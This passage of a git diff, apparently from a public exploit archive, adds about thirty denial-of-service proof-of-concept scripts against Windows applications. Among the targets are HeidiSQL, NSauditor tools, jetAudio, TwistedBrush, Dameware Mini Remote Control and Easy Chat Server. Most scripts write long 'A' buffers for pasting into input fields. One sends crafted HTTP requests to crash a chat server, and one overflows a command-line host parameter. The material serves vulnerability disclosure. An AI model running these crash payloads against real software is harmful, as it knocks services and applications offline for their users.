+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46709.py b/exploits/windows/dos/46709.py
new file mode 100755
index 000000000..bff7b9129
--- /dev/null
+++ b/exploits/windows/dos/46709.py
@@ -0,0 +1,21 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: PCHelpWareV2 1.0.0.5 - 'Group' Denial of Service (PoC)
+# Date: 15/04/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.uvnc.com/home.html
+# Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
+# Version: 1.0.0.5
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "PCHelpWareV2.py", it will create a new file "PCHelpWareV2.txt"
+# 2.- Copy the text from the generated PCHelpWareV2.txt file to clipboard
+# 3.- Open PCHelpWareV2 Viewer
+# 4.- Go to Properties
+# 5.- Paste clipboard in 'Group' field and click on button 'Ok'
+# 6.- Crashed
+
+buffer = "\x41" * 100
+f = open ("PCHelpWareV2.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46711.py b/exploits/windows/dos/46711.py
new file mode 100755
index 000000000..0a68546fd
--- /dev/null
+++ b/exploits/windows/dos/46711.py
@@ -0,0 +1,21 @@
+# -*- coding: utf-8 -*-
+#!/usr/bin/python
+
+# Exploit Title: AdminExpress 1.2.5 - Denial of Service (PoC)
+# Date: 2019-04-12
+# Exploit Author: Mücahit İsmail Aktaş
+# Software Link: https://admin-express.en.softonic.com/
+# Version: 1.2.5.485
+# Tested on: Windows XP Professional SP2
+
+# Description:
+#
+# 1) Click the "System Compare" button
+# 2) Paste the payload in the "Folder Path" (left)
+# 3) Click the scales icon (in the middle, right side of "Folder Path")
+#
+
+
+buffer = "A" * 5000
+
+print("Payload: \n\n" + buffer + "\n")
\ No newline at end of file
diff --git a/exploits/windows/dos/46721.py b/exploits/windows/dos/46721.py
new file mode 100755
index 000000000..6eb128654
--- /dev/null
+++ b/exploits/windows/dos/46721.py
@@ -0,0 +1,23 @@
+#Exploit Title: DHCP Server 2.5.2 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-16
+#Vendor Homepage: http://www.dhcpserver.de/cms/
+#Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments
+#Tested Version: 2.5.2
+#Tested on: Windows 7 x32 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: DHCPSRV_2.5.2.py
+#2.- Open dhcp.txt and copy content to clipboard
+#2.- Open dhcpwiz.exe 
+#3.- Click Next
+#4.- In Network Interface cards Select "Local Area Connection" and click on Next 
+#5.- In Supported Protocols click on Next 
+#6.- In Configuring DHCP for Interface Select "DHCP Options"
+#7.- Select "Bootfile" field and Paste ClipBoard
+#8.- Crashed
+
+cod = "\x41" * 6000
+f = open('dhcp.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46732.py b/exploits/windows/dos/46732.py
new file mode 100755
index 000000000..906aad363
--- /dev/null
+++ b/exploits/windows/dos/46732.py
@@ -0,0 +1,28 @@
+# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
+# Date: 19.04.19
+# Vendor Homepage:http://www.audiotool.net/download.htm
+# Software Link:  http://www.audiotool.net/download/audioconverter.exe
+# Exploit Author: Achilles
+# Tested Version: 5.30
+# Tested on: Windows 7 x64 Sp1
+
+# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
+# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
+# 3.- Load the file "Evil.mp4"
+# 4.- Click ok
+# 5.- Click Gut
+# 5.- And you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.mp4","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/46749.py b/exploits/windows/dos/46749.py
new file mode 100755
index 000000000..b4db7b83f
--- /dev/null
+++ b/exploits/windows/dos/46749.py
@@ -0,0 +1,24 @@
+#Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-24
+#Vendor Homepage: https://www.heidisql.com/
+#Software Link: https://www.heidisql.com/downloads/releases/HeidiSQL_10.1_64_Portable.zip
+#Tested Version: 10.1.0.5464
+#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: HeidiSQL_Portable_10.1.0.5464.py
+#2.- Open bd_p.txt and copy content to clipboard
+#2.- Open HeidiSQL
+#3.- Select "New"
+#4.- In Network type select "Microsoft SQL Server (TCP/IP)"
+#5.- Enable "Prompt for credentials" > click on "Open"
+#6.- In Login select "Password" and Paste ClipBoard
+#6.- Click on "Login"
+#7.- Crashed
+
+cod = "\x41" * 2000
+
+f = open('bd_p.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46750.py b/exploits/windows/dos/46750.py
new file mode 100755
index 000000000..1b810d47e
--- /dev/null
+++ b/exploits/windows/dos/46750.py
@@ -0,0 +1,23 @@
+#Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-24
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+#Tested Version: 2.2.4
+#Tested on: Windows 7 x64 Service Pack 1
+ 
+#Steps to produce the crash:
+#1.- Run python code: Backup_key_rec_2.2.4.py
+#2.- Open backup.txt and copy content to clipboard
+#3.- Open Backup Key Recovery
+#4.- Select "Register"
+#5.- In "Name" paste Clipboard
+#6.- In Key type "test"
+#7.- Click "Ok"
+#8.- Crarshed
+ 
+cod = "\x41" * 300
+ 
+f = open('backup.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46754.py b/exploits/windows/dos/46754.py
new file mode 100755
index 000000000..4b92199fe
--- /dev/null
+++ b/exploits/windows/dos/46754.py
@@ -0,0 +1,29 @@
+# Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit
+# Date: 25.04.2019
+# Vendor Homepage:http://www.ddz1977.com/
+# Software Link:  https://files.downloadnow.com/s/software/10/56/16/74/anming_setup.zip?token=1556228877_063f2dc0aed064ee5d13374d8509661c&fileName=anming_setup.zip
+# Exploit Author: Achilles
+# Tested Version: 2.0
+# Tested on: Windows 7 x64 Sp1
+#            Windows XP x86 Sp3
+
+
+# 1.- Run python code :AnMing.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Anming.exe and Click 'Register'
+# 4.- Paste the content of EVIL.txt into the Field: 'Your Name and Registration Code'
+# 5.- Click 'OK'and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/46757.py b/exploits/windows/dos/46757.py
new file mode 100755
index 000000000..ab86172d0
--- /dev/null
+++ b/exploits/windows/dos/46757.py
@@ -0,0 +1,22 @@
+#Exploit Title: NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-24
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+#Tested Version: 3.1.2.0
+#Tested on: Windows 7 x64 Service Pack 1
+ 
+#Steps to produce the crash:
+#1.- Run python code: Nsauditor_3.1.2.0.py
+#2.- Open nsauditor.txt and copy content to clipboard
+#3.- Open Nsauditor
+#4.- In Sessions select "SNMP Auditor"
+#5.- Select "Community" field paste Clipboard
+#6.- Click "Walk"
+#7.- Crarshed
+ 
+cod = "\x41" * 10000
+ 
+f = open('nsauditor.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46758.py b/exploits/windows/dos/46758.py
new file mode 100755
index 000000000..98df8c83f
--- /dev/null
+++ b/exploits/windows/dos/46758.py
@@ -0,0 +1,23 @@
+#Exploit Title: NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-24
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+#Tested Version: 3.1.2.0
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: Nsauditor_name.py
+#2.- Open nsauditor_name.txt and copy content to clipboard
+#3.- Open Nsauditor
+#4.- Select "Register"
+#5.- In "Name" paste Clipboard
+#6.- In Key type "test"
+#7.- Click "Ok"
+#8.- Crarshed
+ 
+cod = "\x41" * 300
+ 
+f = open('nsauditor_name.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46778.py b/exploits/windows/dos/46778.py
new file mode 100755
index 000000000..73b87009e
--- /dev/null
+++ b/exploits/windows/dos/46778.py
@@ -0,0 +1,23 @@
+#Exploit Title: SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-27
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+#Tested Version: 5.2.6
+#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: Spotauditor_name_5.2.6.py
+#2.- Open Spotauditor_name.txt and copy content to clipboard
+#3.- Open SpotAuditor
+#4.- Select "Register" > "Enter Registration Code..."
+#5.- In "Name" paste Clipboard
+#6.- In Key type "test"
+#7.- Click "Ok"
+#8.- Crarshed
+ 
+cod = "\x41" * 300
+ 
+f = open('Spotauditor_name.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46793.txt b/exploits/windows/dos/46793.txt
new file mode 100644
index 000000000..f86cdc980
--- /dev/null
+++ b/exploits/windows/dos/46793.txt
@@ -0,0 +1,32 @@
+#Vendor:     Solarwinds
+#Site Vendor:    https://www.dameware.com/
+#Product:     Dameware Mini Remote Control
+#Version:    10.0 x64
+#Platform:    Windows
+#Tested on:    Windows 7 SP1 x64
+#Dscription:    The DWRCC executable file is affected by a buffer overflow vulnerability.
+#The buffer size passed in on the machine name parameter is not checked
+#Vector:    pass buffer to the machine host name parameter
+
+#Author:    Dino Barlattani dinbar78@gmail.com
+#Link:        http://www.binaryworld.it
+
+#CVE ID:    CVE-2019-9017
+
+#POC in VB Script
+
+option explicit
+dim fold,exe,buf,i,wsh,fso,result
+exe = "DWRCC.exe"
+fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
+#1\"
+for i = 0 to 300
+    buf = buf & "A"
+next
+set wsh = createobject("wscript.shell")
+set fso = createobject("scripting.filesystemobject")
+if fso.folderexists(fold) then
+    fold = fold & exe
+    fold = chr(34) & fold & chr(34)
+    result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
+end if
\ No newline at end of file
diff --git a/exploits/windows/dos/46806.py b/exploits/windows/dos/46806.py
new file mode 100755
index 000000000..bdc9d9d7f
--- /dev/null
+++ b/exploits/windows/dos/46806.py
@@ -0,0 +1,65 @@
+#!/usr/bin/python
+#---------------------------------------------------------
+# Title: Easy Chat Server Version 3.1 - (DOS)
+# Date: 2019-05-07
+# Author: Miguel Mendez Z
+# Team: www.exploiting.cl
+# Vendor: http://www.echatserver.com
+# Software Link: http://www.echatserver.com/ecssetup.exe
+# Platforms: Windows
+# Version: 3.1
+# Tested on: Windows Windows 7_x86/7_x64 [eng]
+#---------------------------------------------------------
+#
+# 1- Primer socket con (GET) generamos una sesion valida para luego hacer el paso 2.
+# 2- Segundo enviamos (POST) la data en la variable message para crashear la aplicacion.
+
+import os, sys, socket
+from time import sleep
+
+ip = '127.0.0.1'
+padding = 'A' * 8000
+
+GET = (
+"GET /chat.ghp?username=1&password=&room=1&sex=1 HTTP/1.1\r\n"
+"User-Agent: Mozilla/4.0\r\n"
+"Host: "+str(ip)+":80\r\n"
+"Accept-Language: en-us\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"Referer: http://"+str(ip)+"\r\n"
+"Connection: Keep-Alive\r\n\r\n"
+)
+
+try:
+  print "\n [*] Ejecutando payload GET (Creando Sesion) - length " + str(len(GET))
+  s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s1.connect((ip, 80))
+  s1.send(GET)
+  s1.recv(1024)
+  s1.close()
+except:
+  print "Sin conexion GET"
+
+sleep(3)
+
+POST = (
+"POST /body2.ghp?username=1&password=&room=1 HTTP/1.1\r\n"
+"Host: "+str(ip)+"\r\n"
+"User-Agent: Mozilla/4.0\r\n"
+"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+"Accept-Language: es-CL,en-US;q=0.5\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"Referer: http://"+str(ip)+"/chatsubmit.ghp?username=1&password=&room=1\r\n"
+"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+"staticname=%3A000539&tnewname=&msayinfo=1&mnewname=&mtowho=All&mfilters=0&mfont=0&mfcolor=1&elist=&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message="+str(padding)+"&chat_flag="
+)
+
+try:
+  print " [*] Ejecutando payload POST (Crashing) - length " + str(len(POST))
+  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s2.connect((ip, 80))
+  s2.send(POST)
+  s2.recv(1024)
+  s2.close()
+except:
+  print "Sin conexion POST"
\ No newline at end of file
diff --git a/exploits/windows/dos/46810.py b/exploits/windows/dos/46810.py
new file mode 100755
index 000000000..0b54ebdfd
--- /dev/null
+++ b/exploits/windows/dos/46810.py
@@ -0,0 +1,21 @@
+#Exploit Title:  jetAudio 8.1.7.20702 Basic - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-07
+#Vendor Homepage: http://www.jetaudio.com/
+#Software Link: http://www.jetaudio.com/download/
+#Tested Version: 8.1.7.20702
+#Tested on: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64
+
+#Steps to produce the crash:
+#1.- Run python code: jetAudio_8.1.7.20702.py
+#2.- Open jetAudio.txt and copy content to clipboard
+#2.- Open jetAudio 
+#3.- Select Menu > Basic Controls > Open URL...
+#4.- In "Enter URL" Paste ClipBoard after "http://" 
+#5.- Click on "Ok"
+#6.- Crashed
+
+cod = "\x41" * 5000
+f = open('jetAudio.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46816.py b/exploits/windows/dos/46816.py
new file mode 100755
index 000000000..3c65f41f0
--- /dev/null
+++ b/exploits/windows/dos/46816.py
@@ -0,0 +1,19 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)
+# Date: 08/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://lyricvideocreator.com/
+# Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe
+# Version: 2.1
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3"
+# 2.- Open LyricVideoCreator.exe
+# 4.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button
+# 5.- Crashed
+
+buffer = "\x41" * 5000
+f = open ("sample.mp3", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46817.py b/exploits/windows/dos/46817.py
new file mode 100755
index 000000000..b01884ca4
--- /dev/null
+++ b/exploits/windows/dos/46817.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC)
+# Date: 08/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.jetaudio.com/
+# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
+# Version: 2.0.1.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt"
+# 2.- Copy the text from the generated LyricMaker.txt file to clipboard
+# 3.- Open JetLyric.exe or Lyric Maker
+# 4.- Paste clipboard in in the field "Title"
+# 5.- Go to file -> Save Lyric...
+# 6.- Save the file with any name, e.g 'sample.jlr'
+# 7.- Crashed
+
+buffer = "\x41" * 5000
+f = open ("LyricMaker.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46818.py b/exploits/windows/dos/46818.py
new file mode 100755
index 000000000..1c163b3ed
--- /dev/null
+++ b/exploits/windows/dos/46818.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC)
+# Date: 08/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.jetaudio.com/
+# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
+# Version: 8.1.7 
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt"
+# 2.- Copy the text from the generated ConvertVideo.txt file to clipboard
+# 3.- Open JetVidCnv.exe or Video Converter
+# 4.- Click on the 'Add Files...' button and select a video file
+# 5.- Paste clipboard in in the field "File Naming"
+# 6.- Click on the 'Preview' button
+# 7.- Crashed
+
+buffer = "\x41" * 512
+f = open ("ConvertVideo.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46819.py b/exploits/windows/dos/46819.py
new file mode 100755
index 000000000..e6d1f8ca8
--- /dev/null
+++ b/exploits/windows/dos/46819.py
@@ -0,0 +1,22 @@
+#Exploit Title:  jetCast Server 2.0 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-09
+#Vendor Homepage: http://www.jetaudio.com/
+#Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
+#Tested Version: 2.0
+#Tested on: Windows 7 Service Pack 1 x64 
+
+#Steps to produce the crash:
+#1.- Run python code: jetCast_Server_2.0.py
+#2.- Open jetCast.txt and copy content to clipboard
+#2.- Open jetCast Server 
+#3.- Select Config 
+#4.- In "Log directory" Paste ClipBoard 
+#5.- Click on "Ok"
+#6.- Click on "Start"
+#7.- Crashed
+
+cod = "\x41" * 5000
+f = open('jetCast.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46821.py b/exploits/windows/dos/46821.py
new file mode 100755
index 000000000..971815381
--- /dev/null
+++ b/exploits/windows/dos/46821.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
+# Date: 09/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
+# Version: 2.2
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
+# 2.- Copy the text from the generated SpotIM.txt file to clipboard
+# 3.- Open SpotIM
+# 4.  Select "Register" > "Enter Registration Code..."
+# 5.- Paste clipboard in the Name/Key field 
+# 6.- Click 'OK'
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("SpotIM.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46822.py b/exploits/windows/dos/46822.py
new file mode 100755
index 000000000..aa6d9497b
--- /dev/null
+++ b/exploits/windows/dos/46822.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC)
+# Date: 09/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe
+# Version: 1.1.5
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt"
+# 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard
+# 3.- Open SpotPalTalk
+# 4.  Select "Register" > "Enter Registration Code..."
+# 5.- Paste clipboard in the Name/Key field 
+# 6.- Click 'OK'
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("SpotPaltalk.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46823.py b/exploits/windows/dos/46823.py
new file mode 100755
index 000000000..4a8a2c031
--- /dev/null
+++ b/exploits/windows/dos/46823.py
@@ -0,0 +1,22 @@
+#Exploit Title:  ASPRunner.NET 10.1 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-09
+#Vendor Homepage: https://xlinesoft.com/
+#Software Link: https://xlinesoft.com/asprunnernet/download.htm
+#Tested Version: 10.1
+#Tested on: Windows 7 Service Pack 1 x64 
+
+#Steps to produce the crash:
+#1.- Run python code: ASPRunner_net_10_1.py
+#2.- Open ASPRunner_10_1.txt and copy content to clipboard
+#3.- Open ASPRunner.NET
+#4.- Click on "Next" > Select "SQLite" database > click on "Next"
+#5.- Click on "Create new database" 
+#6.- In "Table name" field Paste Clipboarad
+#7.- Click on "Create table"
+#8.- Crashed
+
+cod = "\x41" * 10000
+f = open('ASPRunner_10_1.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46824.py b/exploits/windows/dos/46824.py
new file mode 100755
index 000000000..7765c8716
--- /dev/null
+++ b/exploits/windows/dos/46824.py
@@ -0,0 +1,22 @@
+#Exploit Title:  PHPRunner 10.1 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-09
+#Vendor Homepage: https://xlinesoft.com/
+#Software Link: https://xlinesoft.com/phprunner/download.htm
+#Tested Version: 10.1
+#Tested on: Windows 7 Service Pack 1 x64 
+
+#Steps to produce the crash:
+#1.- Run python code: PHPRunner_10_1.py
+#2.- Open PHPRunner_10_1.txt and copy content to clipboard
+#3.- Open PHPRunner
+#4.- Click on "Next" > Select "Microsoft Access" database > click on "Next"
+#5.- Click on "Create new database" > click on "Create table"
+#6.- Select "Create dashboard" > in "Name" field Paste Clipboarad
+#7.- Click on "Ok"
+#8.- Crashed
+
+cod = "\x41" * 10000
+f = open('PHPRunner_10_1.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46830.py b/exploits/windows/dos/46830.py
new file mode 100755
index 000000000..70b49220c
--- /dev/null
+++ b/exploits/windows/dos/46830.py
@@ -0,0 +1,22 @@
+#Exploit Title: SpotMSN 2.4.6 - 'Name/Key' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-12
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://www.nsauditor.com/downloads/spotmsn_setup.exe
+#Tested Version: 2.4.6
+#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: SpotMSN_2.4.6.py
+#2.- Open SpotMSN.txt and copy content to clipboard
+#3.- Open SpotMSN
+#4.- Select "Register" > "Enter Registration Code..."
+#5.- In "Name/Key" paste Clipboard
+#6.- Click "Ok"
+#7.- Crarshed
+ 
+cod = "\x41" * 300
+ 
+f = open('SpotMSN.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46831.py b/exploits/windows/dos/46831.py
new file mode 100755
index 000000000..7156e9c1a
--- /dev/null
+++ b/exploits/windows/dos/46831.py
@@ -0,0 +1,22 @@
+#Exploit Title: DNSS Domain Name Search Software 2.1.8 -  Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-12
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe
+#Tested Version: 2.1.8
+#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: DNSS_2.1.8.py
+#2.- Open DNSS.txt and copy content to clipboard
+#3.- Open Dnss
+#4.- Select "Register" > "Enter Registration Code..."
+#5.- In "Name/Key" paste Clipboard
+#6.- Click "Ok"
+#7.- Crarshed
+ 
+cod = "\x41" * 300
+ 
+f = open('DNSS.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46842.py b/exploits/windows/dos/46842.py
new file mode 100755
index 000000000..99740f506
--- /dev/null
+++ b/exploits/windows/dos/46842.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbselfiestudio_install.exe
+# Version: 2.17
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "Selfie_resize.py", it will create a new file "PoC.txt"
+# 2.- Copy the text from the generated PoC.txt file to clipboard
+# 3.- Open Selfie Studio
+# 4.- Go to 'Image' > 'Resize Image...' 
+# 5.- Paste clipboard in the 'New Width/New Height' field
+# 6.- Click OK
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("PoC.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46843.py b/exploits/windows/dos/46843.py
new file mode 100755
index 000000000..5a23fb73f
--- /dev/null
+++ b/exploits/windows/dos/46843.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
+# Version: 24.06
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "TwistedBrush _resize.py", it will create a new file "PoC.txt"
+# 2.- Copy the text from the generated PoC.txt file to clipboard
+# 3.- Open TwistedBrush Pro Studio
+# 4.- Go to 'Image' > 'Resize Image...' 
+# 5.- Paste clipboard in the 'New Width/New Height' field
+# 6.- Click OK
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("PoC.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46844.py b/exploits/windows/dos/46844.py
new file mode 100755
index 000000000..6fee45b75
--- /dev/null
+++ b/exploits/windows/dos/46844.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
+# Version: 24.06
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "TwistedBrush_recorder.py", it will create a new file "PoC.txt"
+# 2.- Copy the text from the generated PoC.txt file to clipboard
+# 3.- Open TwistedBrush Pro Studio
+# 4.- Go to 'Record' > 'Script Recorder...' 
+# 5.- Paste clipboard in the 'Description' field
+# 6.- Click 'Brush' button
+# 7.- Crashed
+
+buffer = "\x41" * 500000
+f = open ("PoC.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46845.py b/exploits/windows/dos/46845.py
new file mode 100755
index 000000000..910329678
--- /dev/null
+++ b/exploits/windows/dos/46845.py
@@ -0,0 +1,20 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
+# Version: 24.06
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp"
+# 2.- Open TwistedBrush Pro Studio
+# 3.- Go to 'Record' > 'Script Player...' 
+# 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button
+# 5.- Crashed
+
+buffer = "\x41" * 500000
+f = open ("sample.srp", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46848.py b/exploits/windows/dos/46848.py
new file mode 100755
index 000000000..a6dff74f8
--- /dev/null
+++ b/exploits/windows/dos/46848.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC)
+# Date: 14/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.tomabo.com/
+# Software: http://www.tomabo.com/downloads/mp4-converter-setup.exe
+# Version: 3.25.22
+# Tested on: Windows 10
+
+# Proof of Concept:
